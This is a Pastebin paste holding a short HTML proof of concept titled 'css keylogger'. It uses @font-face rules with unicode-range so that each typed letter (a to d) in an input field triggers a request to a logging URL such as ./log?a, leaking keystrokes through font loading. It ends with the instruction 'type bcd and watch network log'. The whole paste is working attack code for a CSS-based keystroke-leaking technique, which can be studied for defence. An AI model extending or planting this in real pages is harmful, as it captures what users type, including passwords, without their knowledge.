Advertisement
Guest User

Untitled

a guest
Mar 22nd, 2019
103
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.53 KB | None | 0 0
  1. <!doctype html>
  2. <title>css keylogger</title>
  3. <style>
  4. @font-face { font-family: x; src: url(./log?a), local(Impact); unicode-range: U+61; }
  5. @font-face { font-family: x; src: url(./log?b), local(Impact); unicode-range: U+62; }
  6. @font-face { font-family: x; src: url(./log?c), local(Impact); unicode-range: U+63; }
  7. @font-face { font-family: x; src: url(./log?d), local(Impact); unicode-range: U+64; }
  8. input { font-family: x, 'Comic sans ms'; }
  9. </style>
  10. <input value="a">type `bcd` and watch network log
  11. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement